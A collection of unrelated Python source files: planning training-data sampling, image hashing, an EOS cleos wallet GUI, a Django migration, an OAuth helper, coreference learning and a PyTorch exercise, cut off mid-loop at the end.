cur.execute(query)
cur.close()
self.client.connection.commit()
@property
def name(self):
return self._identifier.name
@property
def schema(self):
return self._identifier.schema
|
import logging
from collections import defaultdict
from typing import Dict, List
from strips_hgn.planning import STRIPSProblem
from strips_hgn.training_data import StateValuePair, TrainingPair
from strips_hgn.utils.metrics import CountMetric, metrics_logger
from collections import Counter
import numpy as np
_log = logging.getLogger(__name__)
def merge_state_value_pairs_by_domain(
problem_to_state_value_pairs: Dict[STRIPSProblem, List[StateValuePair]],
remove_duplicates: bool = False,
mode = None
) -> Dict[str, List[TrainingPair]]:
"""
Generates a mapping of domain to corresponding TrainingPairs.
The state-value pairs are merged by domain, and corresponding TrainingPair
objects are created.
The TrainingPair objects contain the problem, which we use to generate the
hypergraph later on.
Parameters
----------
problem_to_state_value_pairs: mapping of STRIPSProblem to a list of
state-value pairs
remove_duplicates: whether to remove duplicate TrainingPairs, not
implemented at the moment
Returns
-------
Mapping of domain name to List[TrainingPair]
"""
# Domain to training pairs. We determine a unique domain by its name
domain_to_training_pairs = defaultdict(list)
_log.debug("Start creating Training Pairs.")
for problem, state_value_pairs in problem_to_state_value_pairs.items():
# Create TrainingPair objects which hold the problem context
training_pairs = [
TrainingPair(problem, state_value_pair)
for state_value_pair in state_value_pairs
]
domain_to_training_pairs[problem.domain_name].extend(training_pairs)
_log.debug("Start sampling Training Pairs.")
# uniform sample
for domain, training_pairs in domain_to_training_pairs.items():
prob_cnt = defaultdict(lambda: Counter())
probs = []
num_prob_value = 0
for t in training_pairs:
prob_cnt[t.problem][t.value] += 1
for prob in prob_cnt.keys():
num_prob_value += len(prob_cnt[prob].keys())
for t in training_pairs:
probs.append(1/(num_prob_value*prob_cnt[t.problem][t.value]))
# n_value_min = min(cnt.values())
# n_value = len(cnt.keys())
# _log.info("The smallest set of a heuristic value has {} samples, there are {} different heuristic values.".format(n_value_min, n_value))
if mode:
data_amount = mode.get('bound', 300)
else:
data_amount = 300
if len(training_pairs) > data_amount:
# if n_value*n_value_min <= 10000:
# n = n_value*n_value_min
# else:
# n = 10000
# elif len(training_pairs) > 300:
n = data_amount
else:
n = len(training_pairs)
# n = n_value*n_value_min if len(training_pairs) > 300 and n_value*n_value_min > 300 else len(training_pairs)
# print("/////////////////////////", n, len(training_pairs))
domain_to_training_pairs[domain] = np.random.choice(training_pairs, size=n, replace=False, p=probs).tolist()
if remove_duplicates:
# TODO: figure out best way to implement this
# Options: (option 2 is strongly preferred)
# 1. Remove duplicates based on state and value only
# 2. Remove duplicates based on hypergraph structure, state and value
raise NotImplementedError
# Metrics
total_num_pairs = 0
for domain, training_pairs in domain_to_training_pairs.items():
metrics_logger.add_metric(
CountMetric(
"NumberofMergedTrainingPairs",
len(training_pairs),
context={"domain": domain},
)
)
_log.debug(
f"Merged {len(training_pairs)} training pairs for '{domain}'"
)
total_num_pairs += len(training_pairs)
_log.info(f"Merged {total_num_pairs} training pairs in total")
metrics_logger.add_metric(
CountMetric("TotalNumberOfMergedTrainingPairs", total_num_pairs)
)
return domain_to_training_pairs
|
import multiprocessing as mp
from sys import path
from tqdm import trange
import imagehash
import Image
import os
from DoraemonPocket.src.utils import log_error
from DoraemonPocket.src.multiprocessor import multiprocessing
HASH_DICTS = {
"ahash" : imagehash.average_hash,
"phash" : imagehash.phash,
"dhash" : imagehash.dhash,
"whash-haar" : imagehash.whash,
"colorhash" : imagehash.colorhash,
"crop-resistant" : imagehash.crop_resistant_hash
}
def init_hash_table(path:str, hash_func:function):
hash_table = hash_func(Image.open(path))
return hash_table
def find_hash(tar_hash:str, source_hash_table:list):
try:
return source_hash_table.index(tar_hash)
except:
return -1
def find_paired(sources:list, targets:list, hash_func:str="ahash"):
'''Find target images from source images'.
Using multiprocessing.
Args:
sources (list[str]): source images' paths.
targets (list[str]): target images' paths.
hash_func (str) [optional]: Options "ahash", "phash", "dhash", "whash-haar", "colorhash", "crop-resistant". See https://github.com/JohannesBuchner/imagehash for details.
Returns:
pairs [str, ..., str], [str, ..., str]: source paths and paired target paths
'''
assert type(sources)==list, log_error("sources should be list, ", find_paired)
assert type(targets)==list, log_error("targets should be list, ", find_paired)
assert hash_func in HASH_DICTS.keys(), log_error("hash_func option not permitted, ", find_paired)
for s in sources+targets:
assert os.path.exists(s), log_error("{} do not exists".format(s))
src_hash_table = multiprocessing(init_hash_table, sources, HASH_DICTS[hash_func])
tar_hash_table = multiprocessing(init_hash_table, targets, HASH_DICTS[hash_func])
idx = multiprocessing(find_hash, tar_hash_table, [src_hash_table for _ in range(len(tar_hash_table))])
pairs = [[], []]
for i, id in enumerate(idx):
pairs[0] += src_hash_table[i]
pairs[1] += tar_hash_table[id]
return pairs
|
#!/usr/bin/env python
# coding: utf-8
from tkinter import Tk
from gui.ui import UI
from core import DOCKER_CONTAINER_NAME
from core import TIMEOUT
from core import btc, bch, dash, eth, ltc, neo, xmr
import subprocess
import os
import signal
def run():
global app
root = Tk()
app = UI(root)
# Application
getCleosCommand()
# print(app.tabPanel.producer.get())
root.lift()
root.attributes('-topmost', True)
root.attributes('-topmost', False)
root.mainloop()
def handler(signum, frame):
raise RuntimeError("End of time")
def getCleosCommand():
# TODO The docker has to be removed since was deprecated.
global DOCKER_COMMAND
DOCKER_COMMAND = ['docker', 'exec', DOCKER_CONTAINER_NAME]
CLEOS_COMMAND = ['/opt/eosio/bin/cleos', '-h']
global cleos
# try:
# subprocess.check_output(DOCKER_COMMAND+CLEOS_COMMAND)
# except OSError as e:
# cleos = ['cleos']
# except Exception as e:
# cleos = ['cleos']
# else:
# cleos = ['docker', 'exec', DOCKER_CONTAINER_NAME, '/opt/eosio/bin/cleos']
try:
subprocess.check_output(['cleos', '-h'])
except OSError as e:
app.outputPanel.logger('Can not find the cleos command.\n' + str(e))
except Exception as e:
app.outputPanel.logger('Something went wrong \n' + str(e))
else:
cleos = ['cleos']
# Logic functions
def getProducerInfo():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'get', 'info'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Producer is not available\n' + str(e)
except Exception as e:
print(e)
out = 'Could not get info.\n' + str(e)
finally:
app.outputPanel.logger(out)
def getBlockInfo():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(),
'get', 'block', app.tabPanel.blockNumber.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get block info\n' + str(e)
except Exception as e:
print(e)
out = 'Could not get block info.\n' + str(e)
finally:
app.outputPanel.logger(out)
def getBlockProducers():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(),
'system', 'listproducers'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get producer list\n' + str(e)
except Exception as e:
print(e)
out = "Could not get producer list.\n" + str(e)
finally:
app.outputPanel.logger(out)
def getWalletList():
try:
out = subprocess.run(cleos + ['wallet', 'list'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get wallet list\n' + str(e)
except Exception as e:
print(e)
out = "Could not get wallet list. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getWalletListFilesystem():
if 'docker' in cleos:
# docker exec eos ls /root/eosio-wallet | egrep '\.wallet$'
out = b"Found wallets in filesystem inside docker container:\n> /root/eosio-wallet\n\n"
com = " ".join(DOCKER_COMMAND + ['ls', '/root/eosio-wallet', '|', 'egrep', '\.wallet$'])
out += subprocess.check_output(com, shell=True)
else:
# ls ~/eosio-wallet | egrep '\.wallet$'
out = b"Found wallets in filesystem:\n> ~/eosio-wallet\n\n"
com = " ".join(['ls', '~/eosio-wallet', '|', 'egrep', '\.wallet$'])
out += subprocess.check_output(com, shell=True)
app.outputPanel.logger(out)
def createWallet():
toConsole = app.tabPanel.toConsole.get()
if 'docker' in cleos:
# docker - cleos wallet create -n twal --file /root/twal saved indide docker /root/
try:
if toConsole == '--to-console':
out = subprocess.run(cleos + ['wallet', 'create', '-n', app.tabPanel.walletName.get(),
'--to-console'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
elif toConsole == '--file':
out = subprocess.run(cleos + ['wallet', 'create', '-n', app.tabPanel.walletName.get(),
'--file', "/root/" + app.tabPanel.walletName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not create wallet\n' + str(e)
except Exception as e:
print(e)
out = "Could not create wallet.\n" + str(e)
finally:
app.tabPanel.openWalletName.insert(0, app.tabPanel.walletName.get())
app.outputPanel.logger(out)
else:
walletDir = os.environ['HOME'] + '/eosio-wallet'
if not os.path.exists(walletDir):
os.makedirs(walletDir)
try:
if toConsole == '--to-console':
out = subprocess.run(cleos + ['wallet', 'create', '-n', app.tabPanel.walletName.get(),
'--to-console'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
elif toConsole == '--file':
out = subprocess.run(cleos + ['wallet', 'create', '-n', app.tabPanel.walletName.get(),
'--file', walletDir + "/" + app.tabPanel.walletName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not create wallet\n' + str(e)
except Exception as e:
print(e)
out = "Could not create wallet.\n" + str(e)
finally:
app.tabPanel.openWalletName.insert(0, app.tabPanel.walletName.get())
app.outputPanel.logger(out)
def openWallet():
try:
out = subprocess.run(cleos + ['wallet', 'open', '-n', app.tabPanel.openWalletName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not open the wallet\n' + str(e)
except Exception as e:
print(e)
out = 'Could not open the wallet.\n' + str(e)
finally:
if 'Opened' in out:
out += "\nRemember this wallet as default for this core session!"
app.outputPanel.logger(out)
def unlockWallet(password):
try:
out = subprocess.run(cleos + ['wallet', 'unlock', '-n', app.tabPanel.openWalletName.get(), '--password', password],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Unlock the wallet\n' + str(e)
except Exception as e:
print(e)
out = 'Could not unlock the wallet.\n' + str(e)
finally:
app.outputPanel.logger(out)
def showKeys():
try:
out = subprocess.run(cleos + ['wallet', 'keys'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not show keys\n' + str(e)
except Exception as e:
print(e)
out = 'Could not show keys.\n' + str(e)
finally:
app.outputPanel.logger(out)
def showPrivateKeys(password):
try:
out = subprocess.run(cleos + ['wallet', 'private_keys', '-n', app.tabPanel.openWalletName.get(), '--password', password],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not show private keys\n' + str(e)
except Exception as e:
print(e)
out = 'Could not show private keys.\n' + str(e)
finally:
app.outputPanel.logger(out)
def importKey(key):
try:
out = subprocess.run(cleos + ['wallet', 'import', '-n', app.tabPanel.openWalletName.get(), '--private-key', key],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not import the key\n' + str(e)
except Exception as e:
print(e)
out = 'Could not import the key.\n' + str(e)
finally:
app.outputPanel.logger(out)
def createKeys():
# TODO add --tofile feature
try:
out = subprocess.run(cleos + ['create', 'key', '--to-console'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not create keys\n' + str(e)
except Exception as e:
print(e)
out = 'Could not create keys.\n' + str(e)
finally:
app.outputPanel.logger(out)
def compileContract():
cpp = app.tabPanel.contractFileCPP.get()
wasm = app.tabPanel.contractFileWASM.get()
wast = app.tabPanel.contractFileWAST.get()
abi = app.tabPanel.contractFileABI.get()
try:
out = subprocess.run(['eosio-cpp', '-o', wasm, cpp, '--abigen'],
timeout=TIMEOUT+60, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not compile contract\n' + str(e)
except Exception as e:
print(e)
out = 'Could not compile contract.\n' + str(e)
finally:
if 'error' in out:
app.outputPanel.logger(out)
else:
app.outputPanel.logger("Compile successful\n\n" + out)
try:
out = subprocess.run(['eosio-cpp', '-o', wast, cpp, '--abigen'],
timeout=TIMEOUT+60, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not compile contract\n' + str(e)
except Exception as e:
print(e)
out = 'Could not compile contract.\n' + str(e)
finally:
if 'error' in out:
app.outputPanel.logger(out)
else:
app.outputPanel.logger("Compile successful\n\n" + out)
def setContract():
cpp = app.tabPanel.contractFileCPP.get()
wasm = app.tabPanel.contractFileWASM.get()
wast = app.tabPanel.contractFileWAST.get()
abi = app.tabPanel.contractFileABI.get()
try:
out_code = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'set', 'code', app.tabPanel.accountName.get(), wasm],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out_abi = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'set', 'abi', app.tabPanel.accountName.get(), abi],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out_code = out_code.stdout.decode('utf-8')
out_abi = out_abi.stdout.decode('utf-8')
out = str(out_code) + str(out_abi)
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not set contract\n' + str(e)
except Exception as e:
print(e)
out = 'Could not set contract.\n' + str(e)
finally:
app.outputPanel.logger("Contract successfully pished to the net.\n\n" + out)
def getAccountBalance():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get() ,'get', 'currency', 'balance', 'eosio.token', app.tabPanel.accountName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account balance\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account balance. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getAccountDetails():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get() ,'get', 'account', app.tabPanel.accountName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account details\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account details. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getAccountActions():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'get', 'actions', app.tabPanel.accountName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account actions\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account actions. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getAccountCode():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'get', 'code', app.tabPanel.accountName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account code\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account code. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getAccountAbi():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'get', 'abi', app.tabPanel.accountName.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account abi\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account abi. \n" + str(e)
finally:
app.outputPanel.logger(out)
def getAccountTable():
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'get', 'table', app.tabPanel.accountName.get(), app.tabPanel.accountScope.get(), app.tabPanel.accountTable.get(), '-L', app.tabPanel.accountLower.get(), '-l', app.tabPanel.accountLimit.get()],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not get account table\n' + str(e)
except Exception as e:
print(e)
out = "Could not get account table. \n" + str(e)
finally:
app.outputPanel.logger(out)
def buyRam():
creator = app.tabPanel.accountCreator.get()
owner = app.tabPanel.accountOwner.get()
ram = app.tabPanel.ram.get()
# #buy ram for yourself
# cleos system buyram someaccount1 someaccount1 "10 EOS"
#
# #buy ram for someone else
# cleos system buyram someaccount1 someaccount2 "1 EOS"
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'system', 'buyram', creator, owner, ram],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not buy RAM\n' + str(e)
except Exception as e:
print(e)
out = "Could not get but RAM. \n" + str(e)
finally:
app.outputPanel.logger(out)
def stakeNet():
creator = app.tabPanel.accountCreator.get()
owner = app.tabPanel.accountOwner.get()
net = app.tabPanel.net.get()
cpu = app.tabPanel.cpu.get()
# cleos system delegatebw accountname1 accountname2 "1 SYS" "1 SYS"
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'system', 'delegatebw', creator, owner, net, cpu],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not stake NET\n' + str(e)
except Exception as e:
print(e)
out = "Could not get stake NET. \n" + str(e)
finally:
app.outputPanel.logger(out)
def createAccount():
creator = app.tabPanel.accountCreator.get()
owner = app.tabPanel.accountOwner.get()
activeKey = app.tabPanel.accountActiveKey.get()
ownerKey = app.tabPanel.accountOwnerKey.get()
cpu = app.tabPanel.cpu.get()
net = app.tabPanel.net.get()
ram = app.tabPanel.ram.get()
permission = creator + '@active'
# cleos -u http://IP-HERE:8888 system newaccount --stake-net "0.1000 EOS" --stake-cpu "0.1000 EOS" --buy-ram-kbytes 8 eosio myDesiredAccountName Public key Public key
try:
out = subprocess.run(cleos + ['--url', app.tabPanel.producer.get(), 'system', 'newaccount', creator, owner, ownerKey, activeKey, '--stake-net', net, '--stake-cpu', cpu, '--buy-ram', ram, '--transfer', '-p', permission],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not stake NET\n' + str(e)
except Exception as e:
print(e)
out = "Could not get stake NET. \n" + str(e)
finally:
app.outputPanel.logger(out)
def setWalletDir():
stop = stopKeosd(False)
run = runKeosd(False)
app.outputPanel.logger(stop + '\n' + run)
def stopKeosd(flag):
if flag:
try:
out = subprocess.run(cleos + ['wallet', 'stop'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not stop keosd\n' + str(e)
except Exception as e:
print(e)
out = "Could not stop keosd. \n" + str(e)
finally:
app.outputPanel.logger(out)
else:
try:
out = subprocess.run(cleos + ['wallet', 'stop'],
timeout=TIMEOUT, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = out.stdout.decode('utf-8')
except subprocess.TimeoutExpired as e:
print(e)
out = 'Timeout. Can not stop keosd\n' + str(e)
except Exception as e:
print(e)
out = "Could not stop keosd. \n" + str(e)
finally:
return out
def runKeosd(flag):
# TODO rewrite function
if flag:
try:
out = os.spawnl(os.P_NOWAIT, 'keosd', '--wallet-dir', '~/eosio-wallet')
except Exception as e:
print('Could not run keosd by default path: ' + str(e))
out = "Could not run keosd by default path: " + str(e)
finally:
app.outputPanel.logger(str(out))
else:
try:
out = os.spawnl(os.P_NOWAIT, 'keosd', '--wallet-dir', app.tabPanel.walletDir.get())
except Exception as e:
print('Could not run keosd ' + str(e))
out = "Could not run keosd " + str(e)
finally:
return str(out)
# Currency operations
def getBtcBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = btc.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get BTC balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get BTC balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getEthBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = eth.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get ETH balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get ETH balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getXmrBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = xmr.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get XMR balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get XMR balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getNeoBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = neo.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get NEO balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get NEO balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getLtcBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = ltc.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get LTC balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get LTC balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getBchBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = bch.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get BCH balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get BCH balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
def getDashBalance(address):
signal.signal(signal.SIGALRM, handler)
signal.alarm(TIMEOUT)
try:
out = dash.getBalance(address)
except RuntimeError as e:
print(e)
out = 'Can not get DASH balance. Timeout error.\n' + str(e)
except Exception as e:
print(e)
out = 'Can not get DASH balance.\n' + str(e)
finally:
signal.alarm(0)
app.outputPanel.logger(out)
|
# Generated by Django 2.2.12 on 2020-06-26 12:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stats', '0019_scenariolanguage_include_keys'),
]
operations = [
migrations.AlterField(
model_name='scenariolanguage',
name='include_keys',
field=models.ManyToManyField(blank=True, help_text='Keys selected here will be used as components of the fragment tuples.', related_name='_scenariolanguage_include_keys_+', to='annotations.LabelKey'),
),
migrations.AlterField(
model_name='scenariolanguage',
name='include_labels',
field=models.ManyToManyField(blank=True, help_text='Fragments will be included in the scenario only when they are assigned one of the selected labels. Leave emtpy to include all fragments.', related_name='_scenariolanguage_include_labels_+', to='annotations.Label', verbose_name='Filter by labels'),
),
]
|
import requests
import urllib
from config import setting
from model import user
config = setting.config
class oauthbase(object):
def __init__(self,user=None):
self.set_user(user)
def check_err(self,json):
code = self.str_err_code
msg = self.str_err_msg
name = self.name
if code in json:
if name == "douban" and json[msg].startswith("access_token_has_expired"):
user.update_access_token(name,self.user[name+"_id"],None)
else:
raise Exception(json[msg])
def signed_request(self,method,url,data={}):
if not self._token:
return {}
req = requests.request(method,url,data=data,headers={"Authorization":self.header_str + " "+self._token})
json = req.json()
self.check_err(json)
return json
def signed_post(self,url,data={}):
return self.signed_request("post",url,data=data)
def signed_get(self,url):
return self.signed_request("get",url)
def get_access_token(self,code):
name = self.name
data = {
"client_id":config["auth_"+name+"_key"],
"client_secret":config["auth_"+name+"_secret"],
"redirect_uri":config["auth_"+name+"_callback"],
"grant_type":"authorization_code",
"code":code
}
res_access_token = requests.post(self.access_token_url,data=data)
res_json = res_access_token.json()
try:
self.check_err(res_json)
except Exception,e:
return str(e)
return res_json["access_token"]
def set_user(self,user):
token_name = self.name + "_access_token"
self.user = user
if user and token_name in user:
self._token = user[token_name]
def redirect(self):
name = self.name
base = self.authorize_url
key = config["auth_"+name+"_key"]
secret = config["auth_"+name+"_secret"]
callback = config["auth_"+name+"_callback"]
qs = urllib.urlencode({"redirect_uri":callback,"client_id":key,"response_type":"code"})
url = base+"?"+qs
return url
|
""" Manage learning from training data and making predictions on test data. """
import logging
__author__ = 'smartschat'
def learn(training_corpus, instance_extractor, perceptron):
""" Learn a model for coreference resolution from training data.
In particular, apply an instance/feature extractor to a training corpus and
employ a machine learning model to learn a weight vector from these
instances.
Args:
training_corpus (Corpus): The corpus to learn from.
instance_extractor (InstanceExtracor): The instance extractor that
defines the features and the structure of instances that are
extracted during training.
perceptron (Perceptron): A perceptron (including a decoder) that
learns from the instances extracted by ``instance_extractor``.
Returns:
A tuple consisting of
- **priors** (*dict(str,float)*): A prior weight for each label
in the graphs representing the instances,
- **weights** (*dict(str, array)*): A mapping of labels to weight
vectors. For each label ``l``, ``weights[l]`` contains weights
for each feature seen during training (for representing the
features we employ *feature hashing*). If the graphs employed are
not labeled, ``l`` is set to "+".
"""
logging.info("Learning.")
logging.info("\tExtracting instances and features.")
substructures, arc_information = instance_extractor.extract(
training_corpus)
logging.info("\tFitting model parameters.")
perceptron.fit(substructures, arc_information)
return perceptron.get_model()
def predict(testing_corpus,
instance_extractor,
perceptron,
coref_extractor):
""" According to a learned model, predict coreference information.
Args:
testing_corpus (Corpus): The corpus to predict coreference on.
instance_extractor (InstanceExtracor): The instance extracor that
defines the features and the structure of instances that are
extracted during testing.
perceptron (Perceptron): A perceptron learned from training data.
argmax_function (function): A decoder that computes the best-scoring
coreference structure over a set of structures.
coref_extractor (function): An extractor for consolidating pairwise
predictions into coreference clusters.
Returns:
A tuple containing two dicts. The components are
- **mention_entity_mapping** (*dict(Mention, int)*): A mapping of
mentions to entity identifiers.
- **antecedent_mapping** (*dict(Mention, Mention)*): A mapping of
mentions to their antecedent (as determined by the
``coref_extractor``).
"""
logging.info("Predicting.")
logging.info("\tRemoving coreference annotations from corpus.")
for doc in testing_corpus:
doc.antecedent_decisions = {}
for mention in doc.system_mentions:
mention.attributes["antecedent"] = None
mention.attributes["set_id"] = None
logging.info("\tExtracting instances and features.")
substructures, arc_information = instance_extractor.extract(testing_corpus)
logging.info("\tDoing predictions.")
arcs, labels, scores = perceptron.predict(substructures, arc_information)
logging.info("\tClustering results.")
return coref_extractor(arcs, labels, scores, perceptron.get_coref_labels())
|
import torch
import numpy as np
from tme6 import CirclesData
from torch.autograd import Variable
def loss_accuracy(Yhat, Y):
L = - torch.mean(Y * torch.log(Yhat))
_, indYhat = torch.max(Yhat, 1)
_, indY = torch.max(Y, 1)
acc = torch.sum(indY == indYhat) #* 100 / indY.size(0);
acc = float(acc.data[0]) * 100./indY.size(0)
return L, acc
def init_params_auto(nx, nh, ny):
params = {}
params['Wh'] = Variable(torch.randn(nh, nx), requires_grad=True)
params['bh'] = Variable(torch.zeros(nh, 1), requires_grad=True)
params['Wy'] = Variable(torch.randn(ny, nh) * 0.3, requires_grad=True)
params['by'] = Variable(torch.zeros(ny, 1),requires_grad=True)
return params
def forward(params, X):
bsize = X.size(0)
nh = params['Wh'].size(0)
ny = params['Wy'].size(0)
outputs = {}
outputs['X'] = X
outputs['htilde'] = torch.mm(X, params['Wh'].t()) + params['bh'].t().expand(bsize, nh)
outputs['h'] = torch.tanh(outputs['htilde'])
outputs['ytilde'] = torch.mm(outputs['h'], params['Wy'].t()) + params['by'].t().expand(bsize, ny)
outputs['yhat'] = torch.exp(outputs['ytilde'])
outputs['yhat'] = outputs['yhat'] / (outputs['yhat'].sum(1, keepdim=True)).expand_as(outputs['yhat'])
return outputs['yhat'], outputs
def sgd(params, eta=0.05):
params['Wy'].data -= eta * params['Wy'].grad.data
params['Wh'].data -= eta * params['Wh'].grad.data
params['by'].data -= eta * params['by'].grad.data
params['bh'].data -= eta * params['bh'].grad.data
return params
data = CirclesData()
data.plot_data()
# init
N = data.Xtrain.shape[0]
Nbatch = 20
nx = data.Xtrain.shape[1]
nh = 10
ny = data.Ytrain.shape[1]
eps = 30
params = init_params_auto(nx, nh, ny)
for iteration in range(20):
perm = torch.randperm(N)
